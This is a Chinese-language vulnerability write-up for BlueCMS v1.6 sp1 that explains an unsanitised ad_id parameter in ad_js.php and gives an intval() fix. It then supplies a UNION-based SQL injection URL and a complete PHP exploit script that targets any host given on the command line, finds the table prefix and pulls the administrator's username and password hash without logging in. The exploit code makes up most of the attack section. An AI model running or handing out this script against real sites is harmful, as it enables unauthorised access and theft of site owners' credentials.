BlueCMS(地方分类信息门户专用CMS系统)

基于当今最流行的开源组合PHP+MYSQL开发
每个分类均可单独设置Title、Keywords、Description,方便SEO
强力模板引擎,显示风格自由定义,随心所欲
多功能模块插件,操作简单方便
智能缓存技术,提高网站性能
多属性模型自定义,栏目功能强大

缺陷文件:ad_js.php

漏洞成因:

12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //根目录下其他文件都做了很好的过滤,对数字型变量几乎都用了intval()做限制,唯独漏了这个文件,居然只是用了trim()去除头尾空格。。

19: $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id); //直接代入查询。。汗。

修补方案:

$ad_id = !empty($_GET['ad_id']) ? intval($_GET['ad_id']) : '';

漏洞Poc:

http://localhost/cms/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

右键查看源代码得到返回数据。

漏洞Exp:
<?php
print_r('
        ------------------------------------------
        BlueCMS v1.6 sp1 "ad_js.php" SQL Injection
        get admin_user pwd-hash without login
        by CnCxzSec衰仔 http://hi.baidu.com/cncxz
        ------------------------------------------   
        ');
if($argc<3){
print_r('
        ------------------------------------------
        usage:php '.$argv[0].' host path
        host: without "http://"
        path: path to bluecms
        example:
        php '.$argv[0].' localhost /
        ------------------------------------------
        ');
die;   
}
$host=$argv[1];
$path=$argv[2];
$inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1";
print_r("
  • exploiting, please wait...");
    $fp=fsockopen($host, 80, $errno, $errstr, 30);
    if(!$fp) echo "$errstr($errno)<br />\n";
    else{
        $head ="GET $path"."$inj HTTP/1.1\r\n";
        $head .="Host:".$host."\r\n";
        $head .="Connection: Close\r\n\r\n";
    $result='';
    fputs($fp,$head);
    while(!feof($fp)){
        $result .=fgets($fp,4096);
    }
    if (!eregi("document",$result)){
            
        $temp=explode("FROM ",$result);
        if(isset($temp[1])){$temp2=explode("ad",$temp[1]);}
        if($temp2[0])
        $prefix=$temp2[0];
    print_r('
            
  • prefix -> '.$prefix);
        $inj="/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20".$prefix."admin%20where%20admin_id=1";
        $fp=fsockopen($host, 80, $errno, $errstr, 30);
        if(!$fp) echo "$errstr($errno)<br />\n";
        else{
        $head ="GET $path"."$inj HTTP/1.1\r\n";
        $head .="Host:".$host."\r\n";
        $head .="Connection: Close\r\n\r\n";
        $result='';
        fputs($fp,$head);
        while(!feof($fp)){
            $result .=fgets($fp,4096);
        }
        fclose($fp);
        $rs1=strstr($result,"\"");
        $name=substr($rs1,1,strpos($rs1,"|")-1);
        $pass=substr($rs1,strpos($rs1,"|")+5,32);
        print_r('
            
  • we get it!');
        print_r('
            username:'.$name);
        print_r('
            pwd-hash:'.$pass);   
       }
    }
    else{
        $rs1=strstr($result,"\"");
        $name=substr($rs1,1,strpos($rs1,"|")-1);
        $pass=substr($rs1,strpos($rs1,"|")+5,32);
        print_r('
            
  • we get it!');
        print_r('
            username:'.$name);
        print_r('
            pwd-hash:'.$pass);
       }
    }
    ?>